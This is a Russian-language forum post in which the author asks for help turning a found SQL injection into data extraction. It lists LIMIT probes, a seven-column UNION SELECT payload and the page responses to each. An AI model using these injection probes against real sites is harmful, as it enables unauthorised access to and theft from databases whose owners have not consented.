Всем привет! Оставив безуспешные попытки (спасибо администрации за молчание) восстановить свой аккаунт, зарегистрировался снова. Вот, теперь приходится писать в песочнице ) Но вопрос очень актуальный, так что прошу помощи. Есть SQLi, пытался раскрутить классически:

id=1 LIMIT 1 - пустая страница

id=1 LIMIT 2 - пустая страница

id=1 LIMIT 3 - пустая страница

id=1 LIMIT 4 - пустая страница

id=1 LIMIT 5 - пустая страница

id=1 LIMIT 6 - пустая страница

id=1 LIMIT 7 - пустая страница

id=1 LIMIT 8 - отображается одна строка с данными

id=1 LIMIT 9 - две строки с данными

id=1 LIMIT 10 - три строки с данными

и т.д.

Затем я подобрал число столбцов, их оказалось 7.

1 LIMIT 1 UNION SELECT 1,2,3,4,5,6,7 - пустая страница

1 LIMIT 2 UNION SELECT 1,2,3,4,5,6,7 - одна строка с данными

1 LIMIT 3 UNION SELECT 1,2,3,4,5,6,7 - две строки с данными

и т.д.

Вывести данные из других таблиц не получается! И потом, что меня вообще убило:

1 LIMIT 0,10 - три строки с данными

1 LIMIT 1,10 - четыре строки с данными

1 LIMIT 2,10 - пустая страница